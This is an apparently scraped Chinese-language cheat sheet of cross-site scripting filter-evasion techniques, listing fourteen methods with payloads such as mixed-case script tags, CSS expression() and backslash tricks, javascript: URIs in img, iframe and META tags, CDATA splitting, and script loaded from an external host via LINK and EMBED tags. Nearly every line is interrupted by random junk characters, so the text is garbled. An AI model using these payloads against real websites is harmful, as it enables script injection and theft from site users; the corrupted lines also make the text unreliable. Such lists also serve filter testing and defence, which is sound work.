1. 改变字符大小写
' b& F( }6 P7 ?: h5 N" c z0 y0 O) z- ?$ N
" n5 L2 h& ~2 _ w/ ]! i- i3 W( L
) _" f9 _3 X$ y5 B <sCript>alert(‘d’)</scRipT>
* b, U6 F3 @9 l" b2 L8 @! S! Z
5 u3 p& c. G- c( d1 m/ ]# h, U2. 利用多加一些其它字符来规避Regular Expression的检查
1 Q8 i5 ?$ G$ q3 ]9 P+ A5 i
6 w" Y" o5 U: `: O5 u/ ^ <<script>alert(‘c’)//<</script>; g) _% e- p2 O o7 F$ ]
* g' a9 [, g; t: w
<SCRIPT a=">" SRC="t.js"></SCRIPT>, e+ T& W* e( W1 A9 x6 n
" C9 q4 l3 H' _, |& S <SCRIPT =">" SRC="t.js"></SCRIPT>
3 {+ ?- U/ t- w! j6 j# b5 ~1 X
8 J) n# o: s* X# ^1 T1 W) @/ b <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
4 i! q8 _7 p1 N
$ e2 `- e5 y- l7 W9 | <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>3 U0 {. m) w9 I0 L7 f! f$ L
5 p8 X$ }- K7 ^/ H <SCRIPT a=`>` SRC="t.js"></SCRIPT>
1 o5 t( k, Q, W+ }& ~
2 o' F* ]: f0 r. f2 P$ A1 q: c; A <SCRIPT a=">’>" SRC="t.js"></SCRIPT>8 Y* N9 V' A% T, x7 `
0 u% l; l6 o2 b: q3 a: n3. 以其它扩展名取代.js( U4 A. y" d3 `* n# ~
0 ~) ?- |& [ E1 ~/ i3 r <script src="bad.jpg"></script>1 M. l& b1 V. w( Q$ p
3 Q0 L5 v7 @9 a
4. 将Javascript写在CSS档里% f2 S" Q" ]6 Y% G) ^
. U: y* V' `5 x g, o, X; K
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
; W- h b5 ?, v1 Y6 k9 Y
" S8 Z* D `! [: I example:
% n6 S# \, u7 Q- j3 o4 d" t7 Z
( m6 D" X* ?5 l/ E8 V4 c5 A body {
1 S" ?# q! o# p+ \1 x2 R" J' J/ X7 J1 N5 W$ Y( G; f m
background-image: url(‘javascript:alert("XSS");’)& d: A0 |1 _" {1 t8 o! N6 N: m
; {! O! l3 z8 R5 a }& \2 |' V. K$ M& ?
( f/ L8 y3 @7 _' J" N3 p; |& B- I$ P
5. 在script的tag里加入一些其它字符
9 C+ D, _ d# ]; R J* b+ y9 C& Y* R) x+ E
<SCRIPT/SRC="t.js"></SCRIPT>
7 {! A' C' o+ n' J' x! w, m- l z+ a W- y8 X& y: X% K7 @1 x4 o
<SCRIPT/anyword SRC="t.js"></SCRIPT>
; b# R7 D0 g$ S+ O7 S7 F* O" Y. \( f4 I
6. 使用tab或是new line来规避1 Z# G' V9 r& C: x9 ]+ n; S
5 v$ V1 a3 i! Q" n3 A4 o# H
<img src="jav ascr ipt:alert(‘XSS3′)">
3 S* q7 Q) e9 g- _$ _: E# M, ^
+ Q* Y4 s1 M' K5 N( p9 T <img src="jav ascr ipt:alert(‘XSS3′)">
3 H( L! L3 e# t( T9 G; J+ `3 Q9 s3 Y" t* [
<IMG SRC="jav ascript:alert(‘XSS’);">
+ o) | I) q% w( o% f
5 Z$ l! k8 G5 ], G -> tag' v$ A0 S* o) v7 ]* e- y- |
2 _. Z+ {* c7 U6 t% Y( j2 w1 h; ^% ~ -> new line. i. ?- P' M* R& I- O
6 m4 f9 U4 d7 L8 u7 o, H) I7. 使用"\"来规避
& q& N2 p/ X _ B8 h# {8 N( V0 l" c9 s8 m
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>8 B! v7 {$ k% l o
6 g; Z# x* E' w' r" _3 y- I <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
' M4 V& a! Q* ]9 @/ n( `) S) G; S# C& p8 z
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
v/ I* ]* `8 N5 a9 e& t0 t& }/ z( f( s5 K4 Y& o4 x
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 s2 n% [- }; p$ z8 Q8 |
6 `/ w4 H3 m+ ?3 f5 R% h <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
# A5 q8 I# ]7 N- A% v1 ?8 c
' }* F& p: o' S8. 使用Hex encode来规避(也可能会把";"拿掉)0 t5 ?( R/ z- Q
( Z1 ?0 A2 P( h7 \7 c# R2 i
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">5 D. d8 ^; _* U9 q
; v0 \; s+ S7 [/ Q$ \& U& P 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 I, g! {9 G, ]) I3 j) G4 ?# Z+ F5 e; B
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
9 A+ \* X/ u7 C) Z! Q) A$ _$ z8 r( p& T
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);"> B9 J/ R8 }# {
$ e1 V) Z# w6 }9 M9. script in HTML tag
# A* v0 c9 p- b
% K; R8 V; L) R1 }. ~6 w n <body onload=」alert(‘onload’)」># `" p7 a3 L0 K% Z+ r! }
. \$ P7 L, j/ k! c3 _ onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload. N- i- ?4 T% S/ }" k
/ Z6 Q1 _# l! o+ [' s$ \ f- W
10. 在swf里含有xss的code
: n" ~" Y" h) b) `; K$ S: m M. C4 u: h2 ?
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
% ]% w4 P8 W4 L% _9 B. s/ E/ t& E d: N* B i" o
11. 利用CDATA将xss的code拆开,再组合起来。: J/ n: w( l' n* y3 E
1 M4 u- G. c5 q% _5 t2 z <XML ID=I><X><C>
. ]* H) D2 |+ T( t
( [, y' h4 h7 Y+ T1 G- N* b <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
6 @3 N! h5 ^8 U0 _( j! W/ P0 |* y2 ^' B
</C></X>* A7 g) y) i" o4 F" Q0 ]+ z1 q
5 @1 ?" X! Q; l/ f w </xml>
' S' v# V& `* Q2 X0 Q9 [! S) a+ |2 m# P0 w. U7 s
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
/ I. B, I6 k2 x( \" c( X" o8 {( h' H
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
2 K' ^8 F2 R$ n4 t
) Y }' b6 W4 {* O7 U8 X <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
, A( l r0 L4 D/ x9 I6 M& e$ Q8 s1 N# }/ B1 V
12. 利用HTML+TIME。
8 c" ^! Y; J7 Q7 H! i4 A) {0 i% Q* o7 W. O; w# h
<HTML><BODY>
# s( n- s9 V+ J
7 E$ \& s2 f" ^0 F" f1 H5 B9 }% I <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">& w- K. ~) f1 j+ V
$ q r D& R2 [% E, }6 a0 Z$ _
<?import namespace="t" implementation="#default#time2">8 y" b {) ^4 E! d: {' h. T) t& P4 m
, V/ h2 }+ P% h
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
( G2 `. u' Z& C) w- ~& z% O8 |# \8 i" ]6 A
</BODY></HTML>9 u5 U1 d0 k) ]: x7 H
+ s9 \; W5 H& C8 I
13. 透过META写入Cookie。
: [" r! K3 h0 ^: i# n Z; _, X' X9 E+ |( G4 T4 \; w
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
) K& q8 G$ i' B6 _) F
+ f* j; S* l( r- t) l14. javascript in src , href , url
0 d: R/ ^5 a; h# i4 n; p- o; w6 e+ P; b% h$ l7 i3 \: a5 I
<IFRAME SRC=javascript:alert(’13′)></IFRAME> {$ p! o5 L6 l* W' a8 f/ Q( C
' _9 Y! j7 m- l% a! w& i
<img src="javascript:alert(‘XSS3′)">+ y. H) u: L) R6 u2 l' r6 X& B
0 @; R* n" l) m) G
<IMG DYNSRC="javascript:alert(‘XSS20′)">
$ e, K! T! _* P
: \# W4 o) {* R: L <IMG LOWSRC="javascript:alert(‘XSS21′)">
, Z9 l) w0 x5 q" X& ?7 L# I- N2 A8 {& b& a$ P4 S! T( n" S, @5 f( _4 n
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">7 F8 t. u. H4 \- w, x9 d0 z4 n1 f
( y. g3 A6 E4 k0 {1 G
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
1 A* T% l; @! A |4 R+ H- \; b" b& r5 z6 M/ N! d. C5 p$ @! x
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">: u% l, v1 B ^; l: Q. t# |3 g# j
3 c1 t/ f9 j/ `: D2 q, g4 q6 g <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">7 @* j2 f5 c$ {* Q" O) a* n. ]
* V2 ~7 L# x: _+ A' [ p+ y <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
- p7 n. I, B! o% L) U$ _( n6 ?3 F4 k5 N7 d
</STYLE><A CLASS=XSS></A>* M3 D6 r7 b: y% L; Z
. f; e: o6 r, [4 I: l3 C$ x2 F <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>3 d- r. N. o+ W3 G3 n9 t1 `& }
+ I$ C1 o' ]5 k; M9 K
|